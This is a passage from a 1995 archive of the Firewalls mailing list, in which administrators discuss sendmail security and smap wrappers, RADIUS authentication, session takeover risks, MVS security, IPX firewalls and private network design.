"Lotus Notes Mail Gateway for SMTP" id 53FA75B7ED64F4AA8625623500809AD1; Tue, 12 Sep 95 18:32:53 To: Firewalls From: Dan Thorson Date: 12 Sep 95 17:50:14 EDT Subject: Re: Secure version of Sendmail Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As many have already said, there's no version of sendmail that could reasonably be considered "secure", however there are some wrappers, "smap" and "smapd" being one pair. Perhaps this is what you're looking for? From firewalls-owner Tue Sep 12 18:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA29234 for firewalls-outgoing; Tue, 12 Sep 1995 17:32:50 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA29226 for ; Tue, 12 Sep 1995 17:32:46 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id RAA05121 for ; Tue, 12 Sep 1995 17:31:28 -0700 Date: Tue, 12 Sep 1995 17:31:28 -0700 Message-Id: <199509130031.RAA05121@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma005116; Tue Sep 12 17:30:59 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Andrew Foss Subject: User Authentication Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there any applications out there public domain or otherwise that do some sort of basic user/password authentication for network users? I've heard the name Radius used, but I thought they made displays? andrew Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Tue Sep 12 19:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01249 for firewalls-outgoing; Tue, 12 Sep 1995 18:35:59 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA01239 for ; Tue, 12 Sep 1995 18:35:56 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA00922; Tue, 12 Sep 95 21:19:45 -0400 Date: Tue, 12 Sep 95 21:19:45 -0400 Message-Id: <9509130119.AA00922@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: MVS vs the world Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is it fair to mention that EBCDIC has no full colon ? back slash ? brackets ? curly brackets ? Number sign ? Exclamation point ? Requires all eight bits just to pass the alphabet ? No ? Sorry 8*) (use TCPIP) Warmly, Padgett ps one of the most popular programs I ever wrote was a CLIST to sort with the numbers first... pps have forgotten JCL three times now - maybe this time it will stick 8*). From firewalls-owner Tue Sep 12 19:02:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA01204 for firewalls-outgoing; Tue, 12 Sep 1995 18:35:13 -0700 Received: from aztec.connectsoft.com (aztec.connectsoft.com [199.237.157.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA01197 for ; Tue, 12 Sep 1995 18:35:10 -0700 Received: (from ophir@localhost) by aztec.connectsoft.com (8.6.9/8.6.9) id SAA29575; Tue, 12 Sep 1995 18:56:51 -0700 Date: Tue, 12 Sep 1995 18:56:50 -0700 (PDT) From: Ophir Ronen To: Andrew Foss cc: firewalls@GreatCircle.COM Subject: Re: User Authentication In-Reply-To: <199509130031.RAA05121@translation.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Information on radius can be obtained @ http://home.merit.edu/webstuff/weiwang/Radius/Radius.html -Ophir *_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_ Ophir Ronen Email: ophir@connectsoft.com ConnectSoft Inc. Phone: (206) 803-5785 Pager: (206) 608-7430 *_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_ On Tue, 12 Sep 1995, Andrew Foss wrote: > Are there any applications out there public domain or otherwise that do some > sort of basic user/password authentication for network users? > I've heard the name Radius used, but I thought they made displays? > > andrew > Andrew Foss Tel. 415/494-NETS(6387) > Network Translation Inc. Dir. 415/855-0725 > 1901 Embarcadero Rd. FAX 415/424-9110 > Palo Alto, CA 94303 email afoss@translation.com > web www.translation.com > From firewalls-owner Tue Sep 12 19:30:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA02095 for firewalls-outgoing; Tue, 12 Sep 1995 19:05:26 -0700 Received: from blob.best.net (blob.best.net [204.156.128.88]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA02088 for ; Tue, 12 Sep 1995 19:05:23 -0700 Received: from shell1.best.com (shell1.best.com [204.156.128.10]) by blob.best.net (8.6.12/8.6.5) with ESMTP id TAA15331; Tue, 12 Sep 1995 19:04:05 -0700 Received: from dns.best.com (yobie.vip.best.com [204.156.155.53]) by shell1.best.com (8.6.12/8.6.5) with SMTP id TAA19107; Tue, 12 Sep 1995 19:04:01 -0700 Date: Tue, 12 Sep 1995 19:04:01 -0700 Message-Id: <199509130204.TAA19107@shell1.best.com> From: "MetaGenesis Inc." To: scott@Disclosure.COM, gregg@smtpgate.Disclosure.COM Subject: Re: Re: Interpreting CERT advisories Cc: Firewalls@GreatCircle.COM X-Mailer: ProntoIP [version 1.0] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FYI IBM now sells Open MVS for the Mainframe which supports a native TCP/IP stack eliminating the need for SNA. It runs on the old 30xx and the new ES 9xxx series of mainframes. From firewalls-owner Tue Sep 12 19:32:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA02813 for firewalls-outgoing; Tue, 12 Sep 1995 19:30:44 -0700 Received: from merit.edu (merit.edu [35.1.1.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA02800 for ; Tue, 12 Sep 1995 19:30:39 -0700 Received: from ohm.merit.edu (ohm.merit.edu [198.108.60.65]) by merit.edu (8.6.12/merit-2.0) with ESMTP id WAA28820 for ; Tue, 12 Sep 1995 22:29:21 -0400 From: William Bulley Received: (web@localhost) by ohm.merit.edu (8.6.9/8.6.5) id WAA24317 for firewalls@GreatCircle.COM; Tue, 12 Sep 1995 22:38:06 -0400 Message-Id: <199509130238.WAA24317@ohm.merit.edu> Subject: Re: user authentication To: firewalls@GreatCircle.COM Date: Tue, 12 Sep 1995 22:38:06 -0400 (EDT) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 741 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The official Merit WWW info on RADIUS is at the following URL: http://www.merit.edu/michnet/ (click on RADIUS) The latest version of Merit RADIUS can be found at this URL: ftp://ftp.merit.edu/radiu/releases/radius.2.3.tar.gz This version has a very few minor rough edges for Ultrix 4.2 and BSDi 2.0 which are being removed and a new version due out soon. Most installations will not be affected (unless they are on those platforms or need the rlmadmin(8) tool). Regards, web... -- William Bulley, N8NXN Senior Systems Research Programmer Merit Network Inc. Domain: web@merit.edu 4251 Plymouth Road MaBell: (313) 764-9993 Ann Arbor, Michigan 48105-2785 Fax: (313) 747-3185 From firewalls-owner Tue Sep 12 20:00:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03816 for firewalls-outgoing; Tue, 12 Sep 1995 19:56:58 -0700 Received: from zork.tiac.net (zork.tiac.net [199.0.65.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA03809 for ; Tue, 12 Sep 1995 19:56:54 -0700 Received: from moose (jerboa.com [199.3.130.95]) by zork.tiac.net (8.6.9/8.6.6.Beta9) with SMTP id WAA19687; Tue, 12 Sep 1995 22:55:25 -0400 Message-Id: <199509130255.WAA19687@zork.tiac.net> X-Sender: ian@tiac.net. X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 12 Sep 1995 22:54:27 -0400 To: gregg@smtpgate.Disclosure.COM, Firewalls@Greatcircle.COM From: Ian Poynter Subject: Re: Re: Interpreting CERT advisories Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:56 PM 9/12/95 est, gregg@smtpgate.Disclosure.COM wrote: >Excuse me?!? MVS has been *in production* since the late 70's; abundantly >installed around the World. IMHO, plenty of time/opportunity for hackers to >[Stuff deleted] Well, I'm not sure about MVS and its (Internet) security record, but there was a lovely article about hacking OS/400 in 2600 recently. Has anyone run across a similarly useful catalog of MVS's problems? I think that since many of the (in)security problems on the Internet are unix-related, people can all too easily build a false sense of security around the "not-unix". I'm just waiting for the first Windows NT problem to show up on the CERT list; given the number of NT-based web servers out there, I suspect it's only a matter of time. Just to set the record straight, although I've worked with Unix for longer, I'm also an NT fan. In fact, I'm typing this on an NT system, so no flames please :-)... Just my $0.02 for a change :-). Ian ----- Ian Poynter ian@jerboa.com Jerboa Internet Services (617) 357-5013 PO Box 120054, Boston, MA 02112 Providing Internet advice, consulting and training for businesses. From firewalls-owner Tue Sep 12 20:30:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04160 for firewalls-outgoing; Tue, 12 Sep 1995 20:08:03 -0700 Received: from lobster.wellfleet.com (lobster.wellfleet.com [192.32.253.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA04152 for ; Tue, 12 Sep 1995 20:08:00 -0700 Received: from paperboy.corpeast.baynetworks.com (paperboy.wellfleet.com) by lobster.wellfleet.com (4.1/SMI-4.1) id AA13376; Tue, 12 Sep 95 23:05:31 EDT Received: from BayNetworks.com by paperboy.corpeast.baynetworks.com (4.1/SMI-4.1) id AA17265; Tue, 12 Sep 95 23:06:38 EDT From: Post_Office@BayNetworks.com (Post Office) Reply-To: Post_Office@BayNetworks.com To: Firewalls@GreatCircle.COM Subject: NDN: Firewalls-Digest V4 #522 Date: 12 Sep 1995 22:32:05 GMT Message-Id: <471719869.1556640@BayNetworks.com> Organization: Bay Networks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry. Your message could not be delivered to: Peter Harrison,Wellfleet Field (Mailbox or Conference is full.) From firewalls-owner Tue Sep 12 20:32:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04023 for firewalls-outgoing; Tue, 12 Sep 1995 20:02:18 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA04016 for ; Tue, 12 Sep 1995 20:02:14 -0700 Received: from pm1-27.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA10958; Tue, 12 Sep 95 21:59:02 -0400 Date: Tue, 12 Sep 95 21:59:02 -0400 Message-Id: <9509130159.AA10958@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Ophir Ronen From: frankw@in.net (Frank Willoughby) Subject: Re: User Authentication Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would not recommend relying on strong authentication only. Any hacker worth their salt will let the user long in using strong authentication and then take over the session after the user has logged in to their system. It is better to rely on user -> firewall and/or firewall -> firewall encryption (using strong authentication, of course) than to rely on strong authentication only. Best Regards, Frank From firewalls-owner Tue Sep 12 20:48:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04375 for firewalls-outgoing; Tue, 12 Sep 1995 20:17:31 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA04368 for ; Tue, 12 Sep 1995 20:17:27 -0700 Received: from pm1-27.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA11694; Tue, 12 Sep 95 22:12:03 -0400 Date: Tue, 12 Sep 95 22:12:03 -0400 Message-Id: <9509130212.AA11694@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) From: frankw@in.net (Frank Willoughby) Subject: Re: MVS vs the world Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I agree with Padgett. MVS might have been good in it's time, but it is time to bury the dinosaur Operating Systems & technologies (my first programs were written on paper tape). Aside from being user unfriendly & a throwback to days of old, MVS is also expensive to deploy. How many security administrators does it take to keep 500 users happy? 5, 10, 20? Most Unix decent system administrators can handle the load themselves. Isn't MVS also from the makers of those systems which require UPS and need a team of engineers to resurrect the systems when the UPS fails? 8^) Sorry for the digression, but I couldn't resist commenting on this topic. Enough tongue-in-cheek for now. We now return you to your firewalls mails. 8^) Best Regards, Frank From firewalls-owner Tue Sep 12 21:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06291 for firewalls-outgoing; Tue, 12 Sep 1995 21:22:01 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA06274 for ; Tue, 12 Sep 1995 21:21:56 -0700 Received: from clark.net (aacccard@clark.net [168.143.0.7]) by clark.net (8.6.12/8.6.5) with SMTP id AAA13658 for ; Wed, 13 Sep 1995 00:20:35 -0400 Date: Wed, 13 Sep 1995 00:20:35 -0400 Message-Id: <199509130420.AAA13658@clark.net> X-Sender: aacccard@clark.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: aacccard@clark.net (john card) Subject: Problem. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please help , If anyone can, I need to find out if a system : 60-8238@wwivnet.org is on this list. I have no idea how to use a list and need help finding this address in the mailing list. I run a bbs and somehow , One of my user subcribed to the list and now I can't get off it because I don't know what it is. Please help me From firewalls-owner Tue Sep 12 22:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA07721 for firewalls-outgoing; Tue, 12 Sep 1995 22:05:21 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA07714 for ; Tue, 12 Sep 1995 22:05:15 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id AAA24232; Wed, 13 Sep 1995 00:02:32 -0500 Message-Id: <199509130502.AAA24232@psisa.com> Subject: Re: Secure version of Sendmail To: bret@real.com (Bret McDanel) Date: Wed, 13 Sep 1995 00:02:31 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509121931.TAA06249@real.com> from "Bret McDanel" at Sep 12, 95 07:31:56 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1646 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Right! However stay away from anything less than 8.6.12. The other > > versions have security holes. > > and 8.6.12 doesnt use syslog? Unless you tell it to, no. As soon as you start running mail gateways, you have the potential of running into a denial of service problem anyways. Maybe not on the hub (firewall) itself, but usually somewhere down the road. And Sendmail is the only useful mail package out there out there. I'd be happy to adopt anything which offers me Sendmail functionality in a more secure fashion. So, let's get things into perspective here. > There is no secure version.. there are only more secure versions.. Please, let's not start the flame wars a la 'secure systems' or 'unbreakable encryption'. You can make Sendmail V8 operate in a pretty secure fashion, with e.g. smap around it if you don't trust it alone. Has there been real exploitation of Sendmail V8 bugs before a fix was available? I'm not aware of any documented cases. > This is not totally the fault of any sendmail, as the case with syslog.. Give me a break, can we please stay away from system dependent holes when discussing individual packages? And let's bring some common sense into all these discussions. And if you don't trust syslog() calls, you're welcome to replace them with either a wrapper or an alternative facility, it's really not that difficult. Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Tue Sep 12 23:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08202 for firewalls-outgoing; Tue, 12 Sep 1995 22:36:35 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA08195 for ; Tue, 12 Sep 1995 22:36:31 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id AAA24912; Wed, 13 Sep 1995 00:33:57 -0500 Message-Id: <199509130533.AAA24912@psisa.com> Subject: Re: Secure version of Sendmail To: ac@hawk.twinds.com (Arley Carter) Date: Wed, 13 Sep 1995 00:33:57 -0500 (CDT) Cc: chk@psa.pencom.com, firewalls@GreatCircle.COM In-Reply-To: from "Arley Carter" at Sep 12, 95 04:35:56 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1337 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > In that light, I query sendmail secure? How?....... In what context do you > mean secure? Secure in the sense that I have had several penetration tests run over Sendmail V8 boxes and so far no one has ever found any vulnerabilities in firewalls designed/managed by me. Yes, most of the time I do run smap. Sendmail V8 should maybe do something like a chroot() to a place where it can't do any damage. Maybe I'll get some time to check out how one could accomplish that very soon, but there are some other things in the queue before that. I like Sendmail V8 because the fix policy is very refreshing. As long as you stay up to date with your latest release, you should'nt have any problems. And then, there's always the possibility of building dual firewalls with a DMZ inbetween -- which in turn open up ways to prevent intrusion effectively even if the exterior firewall is compromised. > That being said I am delivering this mail with sendmail, latest version > of sendmail "certified" by hp for hpux. ;-) :) Wow, geewiz, can I buy anything with that? :) Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Wed Sep 13 04:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA13713 for firewalls-outgoing; Wed, 13 Sep 1995 03:38:28 -0700 Received: from gate.ggr.co.uk (gate.ggr.co.uk [193.128.25.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA13698 for ; Wed, 13 Sep 1995 03:38:12 -0700 Received: from mailhub.ggr.co.uk (uk0x07.ggr.co.uk) by gate.ggr.co.uk; Wed, 13 Sep 1995 11:34:40 +0100 Received: from ukwsv3.ggr.co.uk (imd1707@ukwsv3.ggr.co.uk) by mailhub.ggr.co.uk; Wed, 13 Sep 1995 11:32:57 +0100 Date: Wed, 13 Sep 1995 11:36:25 +0100 (BST) From: Ian Dunkin X-Sender: imd1707@ukwsv3 To: Ian Poynter cc: gregg@smtpgate.Disclosure.COM, Firewalls@Greatcircle.COM Subject: Re: Re: Interpreting CERT advisories In-Reply-To: <199509130255.WAA19687@zork.tiac.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk - On Tue, 12 Sep 1995, Ian Poynter wrote: > At 01:56 PM 9/12/95 est, gregg@smtpgate.Disclosure.COM wrote: > I think that since many of the (in)security problems on the Internet are > unix-related, people can all too easily build a false sense of security > around the "not-unix". I'm just waiting for the first Windows NT problem to > show up on the CERT list; given the number of NT-based web servers out > there, I suspect it's only a matter of time. Ken Hardy posted details on this list of a security hole in the EMWAC NT web server a month or so ago. I understand there's now a fix for this particular one, but it illustrates your point. I. -- Ian Dunkin -- From firewalls-owner Wed Sep 13 05:32:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA15538 for firewalls-outgoing; Wed, 13 Sep 1995 05:23:37 -0700 Received: from netcomsv.netcom.com (uucp13.netcom.com [163.179.3.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA15531 for ; Wed, 13 Sep 1995 05:23:34 -0700 Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id FAA15212; Wed, 13 Sep 1995 05:14:06 -0700 Received: from ws02.hteinc.com by rs02.hteinc.com (8.6.12/1.7) id HAA17333; Wed, 13 Sep 1995 07:49:39 -0400 Date: Wed, 13 Sep 95 07:36:21 PDT From: Kurt Kessel Subject: Creating a Private Network To: Firewalls@GreatCircle.COM X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am working on designing a private netowrk connected by a firewall machine to the Internet. I have read RFC 1597 & the Cheswick and Bellovin book, but need a jump start. What I need to know is their any documents that give more of a "how to" type discussion of the implementation of a private network connect to the Internet? Any suggestions would be appreciated! TIA. Kurt Kessel HTE, Inc. kurt@hteinc.com 407-841-3235 (v) 407-246-8835 (fax) From firewalls-owner Wed Sep 13 06:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16008 for firewalls-outgoing; Wed, 13 Sep 1995 05:46:33 -0700 Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA16001 for ; Wed, 13 Sep 1995 05:46:29 -0700 Received: by gateway.damark.com; id HAA11152; Wed, 13 Sep 1995 07:45:12 -0500 Received: from unknown(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme011142; Wed, 13 Sep 95 07:44:54 -0500 Received: by damark.com (5.65/1.2-eef) id AA00556; Wed, 13 Sep 95 07:43:47 -0500 Message-Id: <9509131243.AA00556@damark.com> From: "william.wells" To: FIREWALLS Subject: IPX firewall? Date: Wed, 13 Sep 95 07:04:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Another way to convert to IP is to use Novell/IP instead of Novell/IPX; although this puts the IP stacks on the clients (but removes the IPX stack). Works great here (we are using FTP Software's TCP/IP stack on the PCs). The problem with it, and I wonder about the others, is that it uses UDP which is generally shunned by firewalls. >From: Andrew Foss >At 08:23 AM 9/12/95 -0700, Bradley E. Hubbard wrote: >>I'm wondering if anyone knows of any firewall products that have been >>developed in and for an IPX environment? >Internet Junction(recently purchased by Cisco) has a gateway that converts >IPX to IP. It's available for Solaris, HP-UX, IRX ... >It has the advantage of not putting TCP stacks on the IPX clients, but it's >not the right solution for many people. William Wells Manager, Technical Support Damark International, Inc From firewalls-owner Wed Sep 13 06:02:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16017 for firewalls-outgoing; Wed, 13 Sep 1995 05:46:38 -0700 Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA16010 for ; Wed, 13 Sep 1995 05:46:34 -0700 Received: by gateway.damark.com; id HAA11153; Wed, 13 Sep 1995 07:45:12 -0500 Received: from unknown(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme011143; Wed, 13 Sep 95 07:44:55 -0500 Received: by damark.com (5.65/1.2-eef) id AA00543; Wed, 13 Sep 95 07:43:44 -0500 Message-Id: <9509131243.AA00543@damark.com> From: "william.wells" To: FIREWALLS Subject: firewall with only one IP address ??? Date: Wed, 13 Sep 95 06:49:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We got our IP address prior to choosing our provider so we didn't have that problem: it is an issue through. In retrospect, since all the Internet traffic flow through a firewall, we are only externally using 1 IP address; internally, we are using more of those 256 addresses. Since IP lookup is via DNS and our internal systems generally use "internal only" IP addresses, I've since determined that switching to a different Class C wouldn't really be a significant problem-- a couple of routers, systems, DNS changes, and coordinating with the root DNS server gods and we'd be done. Still, one does get possessive of ones IP address networks..... >From: billcurr@cyberspace.com >The bummer with that is, (as UUNET just informed me this morning) is if I >ever switch providers or dump UUNET, they want their 256 IP addresses BACK. > >>Agreed with Don: >> >>What's the deal? A class C will give you 256 IP addresses and most >>corporations can qualify for this. Maybe you should go to some of the >>larger ISPs if you're having a problem. William Wells Manager, Technical Support Damark International, Inc From firewalls-owner Wed Sep 13 06:53:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16593 for firewalls-outgoing; Wed, 13 Sep 1995 06:03:49 -0700 Received: from gateway.kellogg.com (gateway.kellogg.com [198.108.149.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16580 for ; Wed, 13 Sep 1995 06:03:43 -0700 Received: from cornelius.scp.com (kellogg.com) by gateway.kellogg.com with SMTP id AA06066 (InterLock SMTP Gateway 3.0 for ); Wed, 13 Sep 1995 09:00:13 -0400 Received: from ccMail by cornelius.scp.com (IMA Internet Exchange v1.04) id 056d3c80; Wed, 13 Sep 95 08:51:20 -0400 Mime-Version: 1.0 Date: Wed, 13 Sep 1995 08:48:11 -0400 Message-Id: <056d3c80@cornelius.scp.com> From: Alex.Eveleigh@kellogg.com (Alex Eveleigh) Subject: Monitoring Activity on the Internet To: firewalls@greatcircle.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, We are using a UNIX firewall machine for our Internet connection as well as a filtering router. This connects us to our service provider who then supplies our connection to the Internet. Our connection only allows outbound traffic with the exception of E-Mail. I would like to get some opinions on how easy it would be for someone to monitor what information is being accessed on the Internet by our company. For example how easy would it be for our competition monitor all sites that people in our company are accessing and what information we are pulling off the Internet. Thanks in advance, Alex From firewalls-owner Wed Sep 13 06:58:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17438 for firewalls-outgoing; Wed, 13 Sep 1995 06:28:55 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA17431 for ; Wed, 13 Sep 1995 06:28:51 -0700 Received: (proberts@localhost) by clark.net (8.6.12/8.6.5) id JAA12126; Wed, 13 Sep 1995 09:27:23 -0400 Date: Wed, 13 Sep 1995 09:27:23 -0400 (EDT) From: "Paul D. Robertson" To: Christian Kuhtz cc: Bret McDanel , firewalls@GreatCircle.COM Subject: Re: Secure version of Sendmail In-Reply-To: <199509130502.AAA24232@psisa.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 13 Sep 1995, Christian Kuhtz wrote: > Unless you tell it to, no. As soon as you start running mail gateways, you have > the potential of running into a denial of service problem anyways. Maybe not on > the hub (firewall) itself, but usually somewhere down the road. Agreed. > And Sendmail is the only useful mail package out there out there. I'd be happy > to adopt anything which offers me Sendmail functionality in a more secure > fashion. So, let's get things into perspective here. > I strongly disagree with this. 'smail' is a perfectly useful mail package, granted the docs leave something to be desired, but it's functionality is greatly useful, and it hasn't had nearly the same level of security problems that sendmail has been vulnerable to. > Give me a break, can we please stay away from system dependent holes when > discussing individual packages? And let's bring some common sense into > all these discussions. System dependent holes can be important when a particular package is vulnerable to it, and others aren't. This list is constantly vulnerable to denial of service attacks on common sense, I doubt that plea will get too far, after all, these are for the most part religious issues. Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Wed Sep 13 07:11:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17576 for firewalls-outgoing; Wed, 13 Sep 1995 06:34:08 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA17569 for ; Wed, 13 Sep 1995 06:34:00 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id IAA17074; Wed, 13 Sep 1995 08:29:16 -0400 Date: Wed, 13 Sep 1995 08:29:16 -0400 From: Ted Doty Message-Id: <199509131229.IAA17074@kgbvax.network.com> To: frankw@in.net, ophir@connectsoft.com Subject: Re: User Authentication In-Reply-To: Mail from 'frankw@in.net (Frank Willoughby)' dated: Tue, 12 Sep 95 21:59:02 -0400 Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk frankw@in.net (Frank Willoughby) writes: > I would not recommend relying on strong authentication only. > > Any hacker worth their salt will let the user long in using strong > authentication and then take over the session after the user has > logged in to their system. It is better to rely on user -> firewall > and/or firewall -> firewall encryption (using strong authentication, > of course) than to rely on strong authentication only. Another possibility is user -> server encryption or user -> user encryption. Certainly the IPSec proposed standards show considerable possibility for the first. See RFCs 1824-1829. User -> user is probably going to be more difficult, due to expected problems with ITAR licensing. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely 